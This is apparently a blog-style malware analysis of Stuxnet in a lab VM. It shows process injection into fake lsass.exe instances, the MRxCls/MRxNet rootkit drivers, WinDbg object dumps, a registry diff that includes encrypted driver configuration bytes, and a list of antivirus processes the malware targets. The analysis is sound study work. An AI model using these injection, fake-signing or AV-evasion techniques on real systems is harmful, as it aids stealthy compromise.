  • UmxCfg.exe - eTrust Configuration Engine (HIPS).
  • fsdfwd.exe - F-Secure.
  • rtvscan.exe - Symantec Real time Virus Scan Service.
  • ccSvchst.exe - Symantec Service Framework.
  • ekrn.exe - ESET Service Process.
  • tmproxy.exe - TrendMicro (PC-cillin in Australia and Virus Buster in Japan).

Malware Execution and Infection

First of all, to even successfully execute the malware you need to set your system time to before June 24th, 2012. This is due to the fact that Stuxnet hard-coded a poison pill to fully delete itself on June 24th, 2012. This was most likely done with the original idea in mind that Stuxnet wouldn't escape the nuclear facilities, which would allow time for Stuxnet to be reversed and ultimately defeated.

This piece of malware wanted to stay inside nuclear facilities, target Siemens systems, cause large actual damage, spread to cause more damage, and then go ghost. Fortunately, it did happen to escape its intended environment (some even speculate deliberately) and was inevitably reversed and defeated long before its hard-coded deletion date.

First of all, let's take a pre-infected look at the system with Autoruns + Process Explorer:

(Ignore the file not found messages)

Note the checked filter options > Verify code signatures + Hide Microsoft entries.


Everything looks to be pretty normal, and nothing really out of the ordinary. We can see we have one instance of lsass.exe.

Now let's turn things up a bit by executing the malware, and then comparing our results from pre-infection:


We can see now within Autoruns we have two new services - MRxCls and MRxNet. These are Stuxnet's kernel-mode drivers which enable its rookit functionality.

One big thing about malware that surfaces to the face of the public media (for whatever reason, we'll assume popularity/intention) is that journalists love to spin it and give awkward buzzwords - Undefeatable, The Most Sophisticated Malware, etc. Was Stuxnet an elborate piece of code? Yes, absolutely. Not only was knowledge needed regarding your typical rootkit/Win development, but heavy reverse engineering knowledge regarding Semens software was necessary as well.

However, one of Stuxnet's biggest weak points was its immense lack of anti-debugging/reversing techniques. Among a slew of reasons such as zero VM obfuscation, you can literally use the default regedit to find the locations of both MRxCLS and MRxNet. For example:



This had led Stuxnet to be something of a joke among some reverse engneers and analysts, even moreso if you believe that it was created by [insert government]. It's hard to imagine [insert government] wouldn't go to any lengths at all to hide its malware, but then again you never really know, right? : ) I'll continue the discussion regarding its kernel-mode functionality a little later as I'd like to swing back to user-mode real quick.

I couldn't get Process Explorer to run after infection, as the VM would bugcheck. I have no idea why, and AFAIK Stuxnet doesn't employ anti-debugging against Sysinternals tools by any means, so it was likely a buggy sample. I digress, and used VMmap instead:


We can see there's now three instances of lsass.exe, two of which are fake (newly created host processes). So first off, which is our legitmate lsass.exe? Well, 2/3 are the only ones above 1xxx regarding PID, so let's assume the only one not above 1xxx is legitimate:


If sort by Protection regarding the tabs, we can see it's mostly Execute/Read which doesn't raise any red flags. Let's assume for the moment this is legitimate and take a look at another one:


Uh oh, we can see two instances of memory that was chosen to share from this lsass.exe that has Write permissions in addition to Execute and Read. When a process has all three, it's a huge red flag for a fake/compromised process. In addition, note how the Size>Commited>Total Working Set, etc are equal. We can now at this point determine PID 648 is legitimate, and PID 1812 is fake. We can also at this point then assume that PID 1840 is fake as well:


Yep! In this case, we have five instances of memory that was chosen to be shared with R/W/E permissions, in addition to ntdll with R/W/E permissions as well. Note the Size>Commited>Total Working Set, etc equals again as well. At this point we can fully determine 1812 and 1840 are our fake lsass.exe instances, and 1840 is in relation to the patching of ntdll.

Let's further compare the three images based on their strings:

(PID 648 - legit)

(PID 1812 - fake #1)

Note we have quite the changes here, with the important being "!This program cannot run in DOS mode.". This is the classic MZ exe format used for .exe files within DOS. We can note the ASCII string - 4D. Let's take a look at the bottom of the string list:

(PID 1812 - fake #1)

We can see a number of functions, such as InternetOpen. We can at this point determine the DLL was successfully injected into this image of lsass.exe.

We can of course expect similar results with PID 1840:

(PID 1840 - fake #2)

We can also see abnormal termination of the NT Kernel, as well as a jmp:


Another big red flag of a malformed image.

Let's head back to discussing our kernel-mode drivers, MRxCls and MRxNet. As noted above, these two drivers aren't packed whatsoever with a protector nor packer, so inspecting them in-depth is painless:

First off, both of these drivers were digitally signed (albeit fake... what a surprise) to fool the user into believing it was a legitmate driver signed off as such by VeriSign. For example:


We can see MRxCls was fake-signed by VeriSign which claimed to be from Realtek. Realtek is obviously a legitimate company and releases lots of software/drivers for their products, such as audio, so this would fool a user if they ever questioned the legitimacy of the apparent MRxCls/Net drivers.

Using SwishDbgExt, let's dump the list of objects:

 lkd> !ms_object  
   Object: \ (Directory)  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | Hdle | Object Type     | Addr        | Name                                                                                                                               |  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | 0000 | Directory      | 0xFFFFFFFFE100D748 | ArcName                                                                                                                             |   
   | 0000 | Device        | 0xFFFFFFFF821C75C0 | Ntfs                                                                                                                               |   
   | 0000 | Port         | 0xFFFFFFFFE15EABB8 | SeLsaCommandPort                                                                                                                         |   
   | 0000 | Key         | 0xFFFFFFFFE1010478 | \REGISTRY                                                                                                                            |   
   | 0000 | Port         | 0xFFFFFFFFE186B9E8 | ThemeApiPort                                                                                                                           |   
   | 0000 | Port         | 0xFFFFFFFFE1B05230 | XactSrvLpcPort                                                                                                                          |   
   | 0000 | Directory      | 0xFFFFFFFFE15AA4B8 | NLS                                                                                                                               |   
   | 0000 | SymbolicLink     | 0xFFFFFFFFE1008748 | DosDevices                                                                                                                            |   
   | 0000 | Port         | 0xFFFFFFFFE13D4B68 | SeRmCommandPort                                                                                                                         |   
   | 0000 | Port         | 0xFFFFFFFFE173BA00 | LsaAuthenticationPort                                                                                                                      |   
   | 0000 | Device        | 0xFFFFFFFF82063A90 | Dfs                                                                                                                               |   
   | 0000 | Event        | 0xFFFFFFFF821EF5C0 |                                                                                                                                 |   
   | 0000 | Directory      | 0xFFFFFFFFE100E838 | Driver  

Notice the strange 'Driver' object with a 'Directory' type. Let's take a look:

 lkd> !ms_object 0xFFFFFFFFE100E838  
   Object: Driver (Directory)  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | Hdle | Object Type     | Addr        | Name                                                                                                                               |  
   |------|----------------------|--------------------|---------------------------------------------------------------------------|  
   | 0000 | Driver        | 0xFFFFFFFF8231ECC0 | \Driver\Beep                                                                                                                           |   
   | 0000 | Driver        | 0xFFFFFFFF821C72C0 | \Driver\NDIS                                                                                                                           |   
   | 0000 | Driver        | 0xFFFFFFFF821D39C0 | \Driver\KSecDD                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF82198F38 | \Driver\Mouclass                                                                                                                         |   
   | 0000 | Driver        | 0xFFFFFFFF82245410 | \Driver\Raspti                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF81F18768 | \Driver\es1371                                                                                                                          |   
   ...                                                                                                                      |   
   | 0000 | Driver        | 0xFFFFFFFF81EA2880 | \Driver\MRxCls                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF821DE4A0 | \Driver\PCnet                                                                                                                          |   
   | 0000 | Driver        | 0xFFFFFFFF81F0FAE8 | \Driver\MRxNet  

Let's dump the driver object information for MRxNet:

 lkd> !drvobj 81f0fae8  
 Driver object (81f0fae8) is for:  
  \Driver\MRxNet  
 Driver Extension List: (id , addr)  
 Device Object list:  
 820ee288 81f10020 81ebac80 82136298  
 82302298 82339be0 821bb500 821996c0  
 821bc238 8224a9d0   

We can see MRxNet has a lot of device objects, so let's check one:

 lkd> !devobj 81ebac80   
 Device object (81ebac80) is for:  
  \Driver\MRxNet DriverObject 81f0fae8  
 Current Irp 00000000 RefCount 0 Type 00000003 Flags 00000080  
 DevExt 81ebad38 DevObjExt 81ebad40   
 ExtensionFlags (0000000000)   
 AttachedTo (Lower) 821d4450 \FileSystem\Cdfs  

Stuxnet creates new device objects and attaches to the device chain for each device object. As we can see, Stuxnet attached to cdfs.sys, which is part of the filesystem, specifically the CD-ROM filesystem driver. Other filesystem drivers it attaches to are: ntfs.sys, and fastfat.sys. After attaching, Stuxnet manages the driver object, which in turn provides Stuxnet with the ability to succesfully intercept IRP requests.

Other than checking regedit, we can also confirm the existence of the MRxCls service within the registry using the !dreg command, which displays formatted registry key information. Before we do this however, we need to load ntsdexts.dll, or we'll get the following:

 lkd> !dreg System\CurrentControlSet\Services  
 No export dreg found  

This is due to the fact that ntsdexts.dll isn't of course loaded in the extension DLL chain list:

 lkd> .chain  
 Extension DLL search Path:  
   C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem  
 Extension DLL chain:  
   dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]  
   ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]  
   exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]  
   kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll]  
   kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll]  

After loading it however with .load ntsdexts, we can then see it's in the list:

 lkd> .chain  
 Extension DLL search Path:  
   C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem  
 Extension DLL chain:  
   ntsdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:08 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]  
   dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]  
   ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]  
   exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]  
   kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll]  
   kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010  
     [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll]  

Let's now run !dreg again with our path to MRxCls:

 lkd> !dreg System\CurrentControlSet\Services\MRxCls  
 Subkey: Enum  

There it is, and we can see its subkey is Enum. We can confirm that looking back at the screenshot of its registry location above from earlier.

Here were the overall changes in the registry comparing pre-infection > post-infection:

 ----------------------------------  
 Keys deleted: 23  
 ----------------------------------  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell  
 ----------------------------------  
 Values deleted: 110  
 ----------------------------------  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET"  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Description: "MRXCLS"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\DisplayName: "MRXCLS"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\ErrorControl: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Group: "Network"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Start: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Type: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Data: 8F 1F F7 6D 7D B1 C9 09 9D CC 24 7A C6 9F FB 23 90 BD 9D BF F1 D4 51 92 2A B4 1F 6A 2E A6 4F B3 CB 69 7C 0B 92 3B 1B C0 D7 75 17 A9 E3 33 48 DC AD F6 DA EA 2F 87 10 C4 21 81 A5 75 68 00 2E B1 C2 7B EB DD BB 72 47 DC 87 91 14 A5 F3 C4 32 B0 CC 93 38 36 6B 49 0A F2 6F 1F 1D A1 4A 15 05 80 4B 13 A8 AA 82 41 4B 89 DC 89 24 A2 ED 16 37 F3 42 A9 A0 6A 7F 82 CD 90 E5 3C 49 CC B2 97 CA CB 7B 64 C1 48 B2 4C F5 AE 54 42 74 0F 00 31 FD 80 E8 7E 0E 69 12 42 3A EC 0F 6F 03 B8 46 9C 68 97 AC 62 16 FB 1A 1B D9 33 6C E8 F9 93 C3 56 54 A1 89 7A 7B 77 CE BA 0D 95 A7 0F AB 5E 1C 3C 18 63 AE 3E 60 A6 81 BC FA 85 FB 37 A0 0A 57 F9 C9 D3 CF 6B 41 D9 6D CD 39 71 C5 11 83 F1 D9 F3 7D B7 91 F7 70 46 C2 24 F7 B9 0F 2D B2 60 72 1C 8F F9 98 16 34 52 4B 7D 5F 81 5F 35 FD 8B 3E 78 B1 0B 0A 90 5A D8 30 5A 56 90 9A C0 C1 0F EB 95 D5 2F B7 C5 8D 2B 3F 49 41 8B 86 B4 DB 71 67 69 E6 E8 69 77 29 77 18 82 11 8B D7 5D 26 E4 5A 5C 2C 46 C2 F0 02 28 D8 EA 4B 95 9C 3A 3C 12 DA   
 C4 87 21 91 4F D0 6E FA C4 DD B7 C9 AF E2 AE FE 14 0F 53 C4 BA DD 31 1A 38 7B 37 C0 9E 83 FF 2C B2 4C 88 33 C1 89 E5 CA 68 31 2D 20 CE 50 64 7B 39 C7 FB B1 9F A9 0D 6C 2A 82 AE 7F 25 43 A7 A2 28 EB 27 73 C9 45 F9 FD 53 A8 F4 A7 FD B4 90 B2 28 D8 0C 5A A8 84 D0 7F ED 99 25 18 FE B8 4C 48 66 8D 59 40 F6 CC 30 A6 F4 04 E8 76 9C EA 0E F6 A4 4A CE D2  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000"  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\Count: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\NextInstance: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Description: "MRXNET"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\DisplayName: "MRXNET"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\ErrorControl: 0x00000000  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Group: "Network"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Start: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Type: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000"  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\Count: 0x00000001  
 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET"  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Description: "MRXCLS"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\DisplayName: "MRXCLS"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ErrorControl: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Group: "Network"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Start: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Type: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Data: 8F 1F F7 6D 7D B1 C9 09 9D CC 24 7A C6 9F FB 23 90 BD 9D BF F1 D4 51 92 2A B4 1F 6A 2E A6 4F B3 CB 69 7C 0B 92 3B 1B C0 D7 75 17 A9 E3 33 48 DC AD F6 DA EA 2F 87 10 C4 21 81 A5 75 68 00 2E B1 C2 7B EB DD BB 72 47 DC 87 91 14 A5 F3 C4 32 B0 CC 93 38 36 6B 49 0A F2 6F 1F 1D A1 4A 15 05 80 4B 13 A8 AA 82 41 4B 89 DC 89 24 A2 ED 16 37 F3 42 A9 A0 6A 7F 82 CD 90 E5 3C 49 CC B2 97 CA CB 7B 64 C1 48 B2 4C F5 AE 54 42 74 0F 00 31 FD 80 E8 7E 0E 69 12 42 3A EC 0F 6F 03 B8 46 9C 68 97 AC 62 16 FB 1A 1B D9 33 6C E8 F9 93 C3 56 54 A1 89 7A 7B 77 CE BA 0D 95 A7 0F AB 5E 1C 3C 18 63 AE 3E 60 A6 81 BC FA 85 FB 37 A0 0A 57 F9 C9 D3 CF 6B 41 D9 6D CD 39 71 C5 11 83 F1 D9 F3 7D B7 91 F7 70 46 C2 24 F7 B9 0F 2D B2 60 72 1C 8F F9 98 16 34 52 4B 7D 5F 81 5F 35 FD 8B 3E 78 B1 0B 0A 90 5A D8 30 5A 56 90 9A C0 C1 0F EB 95 D5 2F B7 C5 8D 2B 3F 49 41 8B 86 B4 DB 71 67 69 E6 E8 69 77 29 77 18 82 11 8B D7 5D 26 E4 5A 5C 2C 46 C2 F0 02 28 D8 EA 4B 95 9C 3A 3C 12  
  DA C4 87 21 91 4F D0 6E FA C4 DD B7 C9 AF E2 AE FE 14 0F 53 C4 BA DD 31 1A 38 7B 37 C0 9E 83 FF 2C B2 4C 88 33 C1 89 E5 CA 68 31 2D 20 CE 50 64 7B 39 C7 FB B1 9F A9 0D 6C 2A 82 AE 7F 25 43 A7 A2 28 EB 27 73 C9 45 F9 FD 53 A8 F4 A7 FD B4 90 B2 28 D8 0C 5A A8 84 D0 7F ED 99 25 18 FE B8 4C 48 66 8D 59 40 F6 CC 30 A6 F4 04 E8 76 9C EA 0E F6 A4 4A CE D2  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\Count: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\NextInstance: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Description: "MRXNET"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\DisplayName: "MRXNET"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ErrorControl: 0x00000000  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Group: "Network"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Start: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Type: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000"  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\Count: 0x00000001  
 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\NextInstance: 0x00000001  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY:gvzrqngr.pcy: 04 00 00 00 06 00 00 00 00 54 07 85 81 FE CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\ZJ\Ybgf bs Fghkarg\fazj\znyjner.rkr: 04 00 00 00 06 00 00 00 50 13 53 27 90 93 CA 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0: 34 00 31 00 00 00 00 00 2C 3C 8C 70 10 00 73 6E 6D 77 00 00 20 00 03 00 04 00 EF BE 2C 3C 8C 70 2C 3C 8C 70 14 00 00 00 73 00 6E 00 6D 00 77 00 00 00 14 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\NodeSlot: 0x00000022  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\MRUListEx: FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "Documents"  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Mode: 0x00000006  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).x: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).y: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Sort: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\SortDir: 0x00000001  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Col: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ColInfo: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FD DF DF FD 0F 00 06 00 28 00 10 00 34 00 48 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 B4 00 60 00 78 00 78 00 B4 00 B4 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).x: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).y: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).x: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).y: 0xFFFFFFFF  
